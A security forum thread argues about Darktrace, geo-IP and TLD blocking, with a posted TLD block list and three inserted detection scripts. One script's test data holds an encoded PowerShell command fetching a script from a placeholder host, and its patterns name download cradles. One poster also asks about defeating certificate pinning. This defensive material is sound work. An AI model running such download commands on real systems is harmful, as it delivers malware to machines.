geonetix
Mar 6, 2011




Potato Salad posted:

like, what threat model does darktrace help address

the threat model of your employer not spending enough money on bullshit


Internet Explorer
Jun 1, 2005


Potato Salad posted:

idk if darktrace helps improve awareness of ongoing modern c&c / exfiltration methods

like, what threat model does darktrace help address

efb

geonetix posted:

the threat model of your employer not spending enough money on bullshit

Yeah, it's nonsense and I think I may have an opening to kill it off so I'd like to.

It claims to watch network traffic and pick out things that look out of place. Anything from "this user logged into this computer, which we think is odd" to "a file that looks like it contains passwords was accessed off this server" to "this device seems to be communicating to a C&C server."

I actually don't know if there's an industry term for what it does. Network Traffic Analysis? Network Detection and Response? My main problem with it is that it generates a ton of false alerts and honestly needs someone who spends time with it, but we're not big enough to have someone who just doesn't infosec.

It seems even less useful to us than normal with everyone working remotely. We also use Defender ATP, but I guess there is some value in something that monitors the underlying network and doesn't rely on the client/host.

Martytoof
Feb 25, 2003







I trialed DT and it picked up some (noisy) red team exercise stuff so I dunno, it's definitely doing something. We were in the middle of redoing our SIEM so I'm not sure if they would have picked it up or not but holy poo poo for the price they charge I kind of want the appliance to not just detect intrusion but dispatch a hired goon to the source geolocation.

Martytoof fucked around with this message at 22:55 on Oct 6, 2020

Internet Explorer
Jun 1, 2005


Right, that's kinda where I'm at. I know we "got a good deal on it" but it's coming up for renewal and you know how that goes. Right now we need to spend more time on the fundamentals and I am really hoping that I can free up that budget for more down to earth solutions. It's not my money, but we don't have unlimited funds and I'd rather see them go somewhere else.

Martytoof
Feb 25, 2003







Internet Explorer posted:

I actually don't know if there's an industry term for what it does. Network Traffic Analysis? Network Detection and Response? My main problem with it is that it generates a ton of false alerts and honestly needs someone who spends time with it, but we're not big enough to have someone who just doesn't infosec.

It's just some kind of fancy baseline deviation algorithm probably. I don't know for a fact but I would suspect it would be pretty effective inside a closed, static application environment. Like if you have an environment that runs a customer facing service your baseline traffic and patterns probably deviate a LOT less than an office with human beings and my GUESS is that it would be more on-point there with fewer false positives.

Then again, in an environment with a limited subset of expected traffic you could probably piece together something to detect this kind of activity without their price tag. Not saying it's not difficult but I bet the insights you'd get into an environment and the tools you stand up would be much more valuable as a learning exercise.
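An added illustration of the "baseline deviation" idea in the post above; this is not Martytoof's code and not Darktrace's algorithm, just the simplest version a practitioner could stand up themselves. It learns, per (source, destination, port) tuple, the byte counts seen in a training window of constructed flow records, then flags new flows that either go to a never-seen peer or exceed the learned volume by k standard deviations. All flow data, hosts and thresholds are constructed for the example.

```python
"""Toy baseline-deviation detector over NetFlow-style records (constructed data)."""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed training window: (src, dst, dst_port, bytes_out). Not real traffic.
BASELINE_FLOWS = [
    ("10.0.1.5", "10.0.2.10", 443, 12000),
    ("10.0.1.5", "10.0.2.10", 443, 11500),
    ("10.0.1.5", "10.0.2.10", 443, 12800),
    ("10.0.1.5", "10.0.2.11", 5432, 3000),
    ("10.0.1.5", "10.0.2.11", 5432, 3200),
    ("10.0.1.5", "10.0.2.11", 5432, 2900),
    ("10.0.1.6", "10.0.2.10", 443, 8000),
    ("10.0.1.6", "10.0.2.10", 443, 8200),
    ("10.0.1.6", "10.0.2.10", 443, 7900),
]

# Constructed detection window: two normal flows, one volume spike, one new peer.
NEW_FLOWS = [
    ("10.0.1.5", "10.0.2.10", 443, 12100),   # within baseline
    ("10.0.1.5", "10.0.2.11", 5432, 48000),  # ~16x the usual DB traffic
    ("10.0.1.5", "203.0.113.9", 443, 500),   # never-seen external peer
    ("10.0.1.6", "10.0.2.10", 443, 8100),    # within baseline
]


def build_baseline(flows):
    """Collect the byte counts observed for each (src, dst, port) tuple."""
    baseline = defaultdict(list)
    for src, dst, port, nbytes in flows:
        baseline[(src, dst, port)].append(nbytes)
    return baseline


def score_flows(baseline, flows, k=3.0, min_samples=3):
    """Return (key, bytes, reason) for flows that deviate from the baseline.

    reason is "new_peer" when the tuple was never seen in training, or
    "volume_spike" when bytes exceed mean + k * sigma for that tuple.
    """
    alerts = []
    for src, dst, port, nbytes in flows:
        key = (src, dst, port)
        if key not in baseline:
            alerts.append((key, nbytes, "new_peer"))
            continue
        samples = baseline[key]
        if len(samples) < min_samples:
            continue  # too little history to judge volume
        mu, sigma = mean(samples), pstdev(samples)
        # Floor sigma at 5% of the mean so a perfectly flat baseline does not
        # alert on a one-byte change.
        threshold = mu + k * max(sigma, 0.05 * mu)
        if nbytes > threshold:
            alerts.append((key, nbytes, "volume_spike"))
    return alerts


def run_example():
    return score_flows(build_baseline(BASELINE_FLOWS), NEW_FLOWS)


if __name__ == "__main__":
    for key, nbytes, reason in run_example():
        print(f"{reason:13s} {key[0]} -> {key[1]}:{key[2]} ({nbytes} bytes)")
```

The "new_peer" rule is where the false-positive problem described in the thread lives: in a static application tier the set of peers is tiny and stable, so it rarely fires, while on an office network with people browsing it fires on almost every flow unless you whitelist outbound web traffic or aggregate by destination network instead of host.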

evil_bunnY
Apr 2, 2003



Isn't DT literally just bayesian filtering for your traffic/logs?

Dazzo
Jun 22, 2006



DT is not good technology. I've seen it used across multiple different environments and the ML models are pure noise. The times that I've seen it catch things, it was due to the classic network signatures it has (that any network ids would have).

Network sensors in general in this day and age are kind of a waste of money. Unless you have your network setup so it can man in the middle SSL traffic, a network sensor is a literal waste because it can't inspect the encrypted SSL traffic and more and more malware is using SSL for C2 comms. Spend your money instead on a good cross platform EDR.

Potato Salad
Oct 23, 2014

Nobody Cares




Tortured By Flan

there are some NDR tools these days that do substantially more than dark trace ever did. I'm still not sold on the concept of NDR, and I think it's just old engineers trying to sell old products to old it managers who work in old companies that are finally looking at trying to take security seriously for the first time in a century

edit: not to mention that DT doesn't even R

Potato Salad fucked around with this message at 13:28 on Oct 7, 2020

Potato Salad
Oct 23, 2014

Nobody Cares




Tortured By Flan

heck, Azure Sentinel could be thought of as an upgrade to darktrace, and it's not even trying to compete in that old-timey "these log levels are novel" alert system sector

geonetix
Mar 6, 2011




The magical combination of EDR + zscaler + device trust on authentication is fantastic for solving most problems tbh

AlternateAccount
Apr 25, 2005
FYGM

RFC2324 posted:

does anyone think remote desktoping in is cool without explicit approval, because it seems like a no brainer that getting caught at it will get you a talking to nowadays

and as far as tunneling out, if your org is that hardcore about what you are browsing just use your drat phone

Also a lot of methods aggressively advertise themselves and just make it super easy. Chrome Remote Desktop, for example.

Bob Morales
Aug 18, 2006

I love the succulent taste of cop boots

What's the consensus on blocking based on Geo-IP and things like TLD?

My manager blocked everything that wasn't US-based traffic at one point. I've been slowly adding countries back to the list, since because of cloud-based services we were seeing all kinds of denials for legitimate traffic.

What's being pushed for now is blocking all of the 'new' TLD's. Basically anything that isn't a com/net/org/edu/mil

This is just a headache. Security theatre thanks to some dumb mailing lists he is on.

In my mind, those are kind of silly things to rely upon. Sure, you get some protection from random Chinese/Russian botnets, and we don't have any customers that aren't in the USA, but it's not scalable and hard to manage.

Bob Morales fucked around with this message at 17:19 on Oct 7, 2020

Bob Morales
Aug 18, 2006

I love the succulent taste of cop boots

Also, is https://security.stackexchange.com/ worth adding to the OP?

The Fool
Oct 16, 2003



Blocking tld's is dumb

We block Russia and China, but I don't think it actually accomplishes anything except maybe reducing the noise a little

There is still plenty of malicious traffic coming from places you can't block

Proteus Jones
Feb 28, 2013





The Fool posted:

Blocking tld's is dumb

We block Russia and China, but I don't think it actually accomplishes anything except maybe reducing the noise a little

There is still plenty of malicious traffic coming from places you can't block

Most of the poo poo like a driveby on some website or CNC poo poo for a downloaded/phished bot is just as likely to be based in a compromised system that passes the whitelist anyway so...

Biowarfare
Nov 8, 2010

I JUST WISH THIS WAS A PONY SO I COULD JERK IT WHILE I PLAY WOW

Bob Morales posted:

What's the consensus on blocking based on Geo-IP and things like TLD?

My manager blocked everything that wasn't US-based traffic at one point. I've been slowly adding countries back to the list, since because of cloud-based services we were seeing all kinds of denials for legitimate traffic.

What's being pushed for now is blocking all of the 'new' TLD's. Basically anything that isn't a com/net/org/edu/mil

This is just a headache. Security theatre thanks to some dumb mailing lists he is on.

In my mind, those are kind of silly things to rely upon. Sure, you get some protection from random Chinese/Russian botnets, and we don't have any customers that aren't in the USA, but it's not scalable and hard to manage.

The result is log reduction and absolutely nothing more. There is a huge amount of small ISPs (usually rural or WISP startups) that are leasing dirty IP space from CN/RU/whatever. Consider also dropping all of SC/ZA while you're at it. There are multiple /8s in aggregate that were stolen and hijacked and are being used daily for abuse.


Also, you can just buy a US proxy for a cent a day, so really it's just log reduction.

Bob Morales
Aug 18, 2006

I love the succulent taste of cop boots

Okay, so I'm not off-base when I recommend not doing these. I'll probably be forced to anyway.

The .bazar domain has been linked to the Bazar malware so OMG

Here's the email that was forwarded to me, from a mailing list:

Some dildo that probably makes double what I make posted:

MAILING LIST,

What top level domains does your organization currently block?

In light of BAZARLOADER, .bazar is a good TLD to block.

Thank you

XXXXXXX
Sr. Information Security Analyst – Information Services

Some other dildo posted:

YMMV, but this is the list that we've been blocking for a while now.

*.bazar/
*.bid/
*.cf/
*.click/
*.club/
*.cricket/
*.date/
*.ga/
*.gdn/
*.gq/
*.life/
*.loan/
*.men/
*.ml/
*.mobi/
*.moe/
*.news/
*.nu/
*.online/
*.party/
*.photography/
*.photos/
*.press/
*.pw/
*.racing/
*.review/
*.science/
*.space/
*.stream/
*.study/
*.tk/
*.today/
*.top/
*.toys/
*.trade/
*.vip/
*.vn/
*.wang/
*.webcam/
*.website/
*.win/
*.xyz/

Volmarias
Dec 31, 2002


.men but not .women? Wait till the MRA people hear this one

CLAM DOWN
Feb 13, 2007


RICKARUS

It's Moot baby!




lol at that list

Phosphine
May 30, 2011




They block .nu? Like half of Swedish web pages are .nu, because it means now in Swedish. Famous scammer country.

RFC2324
Jun 7, 2012

Http 418


I'm the trailing / showing a block of websites, not actually blocking ips

xtal
Jan 9, 2011



My personal domain and email address is on xyz lol

Bob Morales
Aug 18, 2006

I love the succulent taste of cop boots

quote:

If you have technology that can block encoded powershell commands, powershell from downloading scripts or files from the internet, etc..* it can stop the early phases of Trickbot/Emotet and other malware.
For example, McAfee anti-exploit rules and custom expert rules.
Blocking psexec is also helpful (a tool commonly used in spreading). *
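An added example of the detection side of the quoted advice (not from the mailing list, not from Bob Morales, and not a McAfee rule): a small scanner over constructed process-creation events that flags PowerShell launched with an encoded command, decodes the UTF-16LE/base64 payload so an analyst can read it, and flags download cradles in either the raw or the decoded command line. The event format, hosts, users and the encoded sample are all constructed; the cradle points at the reserved `example.invalid` domain.

```python
"""Flag encoded / downloading PowerShell in constructed process-creation events."""
import base64
import binascii
import re

# powershell.exe accepts -e, -ec, -en, -enc and the full -EncodedCommand;
# the flag must be followed by whitespace and a base64 blob.
ENCODED_FLAG = re.compile(r"(?i)(?<!\S)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")

# Common "fetch something from the internet" primitives worth a second look.
DOWNLOAD_RE = re.compile(
    r"(?i)DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b|Start-BitsTransfer"
)


def _enc(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (constructed sample helper)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed events: timestamp|host|user|image|command line
SAMPLE_EVENTS = [
    "2020-10-07T18:41:00Z|WS01|alice|powershell.exe|powershell.exe -NoProfile -Command Get-Date",
    "2020-10-07T18:41:05Z|WS02|bob|powershell.exe|powershell.exe -NoP -W Hidden -enc "
    + _enc("Invoke-WebRequest -Uri http://example.invalid/u.ps1 -OutFile C:\\Temp\\u.ps1"),
    "2020-10-07T18:41:09Z|WS03|carol|powershell.exe|powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    "2020-10-07T18:41:12Z|WS04|dave|notepad.exe|notepad.exe C:\\notes.txt",
]


def decode_encoded_command(blob: str) -> str:
    """Decode the base64 UTF-16LE payload of -EncodedCommand."""
    raw = base64.b64decode(blob, validate=True)
    return raw.decode("utf-16-le")


def analyse_process_event(line: str):
    """Return a finding dict for PowerShell events, or None for anything else."""
    parts = line.split("|", 4)
    if len(parts) != 5:
        return None  # malformed event, skip rather than crash the pipeline
    _ts, host, user, image, cmdline = parts
    if not image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return None

    findings, decoded = [], None
    match = ENCODED_FLAG.search(cmdline)
    if match:
        try:
            decoded = decode_encoded_command(match.group(1))
            findings.append("encoded_command")
        except (binascii.Error, UnicodeDecodeError):
            findings.append("encoded_command_undecodable")

    # Look for download primitives in both the visible and the decoded text.
    searchable = cmdline + (" " + decoded if decoded else "")
    if DOWNLOAD_RE.search(searchable):
        findings.append("download_cradle")

    return {"host": host, "user": user, "decoded": decoded, "findings": findings}


def scan(events):
    """Return only events that produced at least one finding."""
    results = (analyse_process_event(e) for e in events)
    return [r for r in results if r and r["findings"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["host"], hit["user"], hit["findings"], hit["decoded"])
```

Note that `-ExecutionPolicy Bypass` on its own does not trip the encoded-command regex, which is deliberate: that switch is noisy in legitimate admin scripts, and a rule that fires on every `-e` prefix would drown the analyst the same way the thread complains about.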

Pablo Bluth
Sep 7, 2007

I've made a huge mistake.


I have a .co domain so every exchange of my email address has to include the discussion 'not dot UK?'

Biowarfare
Nov 8, 2010

I JUST WISH THIS WAS A PONY SO I COULD JERK IT WHILE I PLAY WOW

Bob Morales posted:

The .bazar domain has been linked to the Bazar malware so OMG

This is a blockchain TLD, it isn't even publicly resolvable on the internet

Subjunctive
Sep 12, 2006

careful now


Biowarfare posted:

blockchain TLD

boy, I didn't need to know that that was even a thing, at all

Biowarfare
Nov 8, 2010

I JUST WISH THIS WAS A PONY SO I COULD JERK IT WHILE I PLAY WOW

Subjunctive posted:

boy, I didn't need to know that that was even a thing, at all

this is the new https://en.wikipedia.org/wiki/New.net

(you might as well block .onion while youre at it)

Subjunctive
Sep 12, 2006

careful now



that's definitely something that didn't need a remake

Bob Morales
Aug 18, 2006

I love the succulent taste of cop boots

Biowarfare posted:

This is a blockchain TLD, it isn't even publicly resolvable on the internet



https://emercoin.com/en/documentati...ns-introduction

Biowarfare
Nov 8, 2010

I JUST WISH THIS WAS A PONY SO I COULD JERK IT WHILE I PLAY WOW

yeah if you're curious there's a handful of alternative dns roots of sorts

the biggest network of separate resolvers is opennic

https://en.wikipedia.org/wiki/OpenN...ring_agreements

IIRC, other than for .onion, most malware doesn't bother running its own software (like actual blockchain clients); most of it just tries to resolve against a random public resolver instead of the local system resolver

Biowarfare fucked around with this message at 18:46 on Oct 7, 2020
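An added example built on the last point in the post above (not Biowarfare's code, not tied to any product): if malware resolves against a random public resolver instead of the local one, the detectable artifact is DNS traffic (port 53, or 853 for DNS-over-TLS) from an internal host to anything other than the approved resolvers. The flow-log format, the approved resolver addresses and the sample lines are constructed.

```python
"""Find internal hosts talking DNS to non-approved resolvers (constructed data)."""
import re
from collections import defaultdict

# Constructed: the only resolvers internal hosts are supposed to use.
APPROVED_RESOLVERS = {"10.0.2.53", "10.0.2.54"}
DNS_PORTS = {53, 853}  # plain DNS and DNS-over-TLS

# Constructed key=value flow-log format; real exporters differ.
FLOW_RE = re.compile(r"src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+) proto=(?P<proto>\w+)")

SAMPLE_LOG = """\
2020-10-07T18:40:01Z src=10.0.1.5 dst=10.0.2.53 dport=53 proto=udp
2020-10-07T18:40:02Z src=10.0.1.5 dst=10.0.2.10 dport=443 proto=tcp
2020-10-07T18:40:05Z src=10.0.1.7 dst=198.51.100.1 dport=53 proto=udp
2020-10-07T18:40:06Z src=10.0.1.7 dst=198.51.100.2 dport=53 proto=udp
2020-10-07T18:40:09Z src=10.0.1.7 dst=198.51.100.3 dport=853 proto=tcp
2020-10-07T18:40:10Z src=10.0.1.8 dst=10.0.2.54 dport=53 proto=udp
this line is garbage and must be skipped, not crash the parser
"""


def parse_flows(text):
    """Yield (src, dst, dport, proto) for each well-formed line; skip the rest."""
    for line in text.splitlines():
        match = FLOW_RE.search(line)
        if not match:
            continue
        yield match["src"], match["dst"], int(match["dport"]), match["proto"]


def find_rogue_resolver_use(text, approved=APPROVED_RESOLVERS):
    """Map each source host to the set of (dst, port) DNS endpoints outside the approved list."""
    rogue = defaultdict(set)
    for src, dst, dport, _proto in parse_flows(text):
        if dport in DNS_PORTS and dst not in approved:
            rogue[src].add((dst, dport))
    return dict(rogue)


if __name__ == "__main__":
    for host, endpoints in find_rogue_resolver_use(SAMPLE_LOG).items():
        print(host, "->", sorted(endpoints))
```

The matching prevention control is an egress rule that only lets the approved resolvers reach port 53/853 outbound, so that the detection above becomes a list of hosts whose queries were blocked rather than hosts whose queries succeeded. DNS-over-HTTPS on 443 is not caught by this port-based check and needs either a resolver-IP feed or TLS SNI inspection.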

abigserve
Sep 13, 2009

this is a better avatar than what I had before


It's unreasonable to do geo-ip blocking but you should definitely consume as many good threat intel feeds as you can, and pull them into automatic blacklists.

Biowarfare
Nov 8, 2010

I JUST WISH THIS WAS A PONY SO I COULD JERK IT WHILE I PLAY WOW

I haven't done this in a while, what's the easiest way to break cert pinning on a Win32 application?

file magic says PE32 executable (GUI) Intel 80386, for MS Windows; as far as I know it ships with embedded OpenSSL and a bunch of CA certificates embedded into the exe.


edit: I'm going to hex edit a DER into one of the replacements and see what happens, lol

Biowarfare fucked around with this message at 12:20 on Oct 9, 2020

Achmed Jones
Oct 16, 2004









It's very likely you're legally compelled to block traffic from embargoed countries. Geoip blocking is useless for actually preventing attacks from those countries, but does fulfill your legal obligation*

*In my experience, that is. I am not a lawyer, this is not legal advice

The Fool
Oct 16, 2003



Achmed Jones posted:

It's very likely you're legally compelled to block traffic from embargoed countries. Geoip blocking is useless for actually preventing attacks from those countries, but does fulfill your legal obligation*

*In my experience, that is. I am not a lawyer, this is not legal advice

that just sounds dumb on its face

random ip traffic is not the same as doing business with

RFC2324
Jun 7, 2012

Http 418


The Fool posted:

that just sounds dumb on its face

random ip traffic is not the same as doing business with

Usually, for legal purposes, you just need to be able to point at a thing and say "see? An attempt was made!" And your liability is covered

Achmed Jones
Oct 16, 2004









What, stupid legal interpretations of tech poo poo? Well I never

Context also matters. Infosec person at a large legal firm vs a saas shop vs an ad network vs netflix

Achmed Jones
Oct 16, 2004









RFC2324 posted:

Usually, for legal purposes, you just need to be able to point at a thing and say "see? An attempt was made!" And your liability is covered

This is exactly how it was explained to me at oldjob lol

xtal
Jan 9, 2011



The Fool posted:

that just sounds dumb on its face

random ip traffic is not the same as doing business with

Good luck explaining the difference to an 80 year old judge with syphilis and covid

Internet Explorer
Jun 1, 2005


If you need to follow ITAR or something, it's absolutely something that you'll need to do. Pretty much for the reasons stated above.


klosterdev
Oct 10, 2006

Na na na na na na na na Batman!

xtal posted:

Good luck explaining the difference to an 80 year old judge with syphilis and covid

Are we talking about the Google/Oracle API Copyright case now
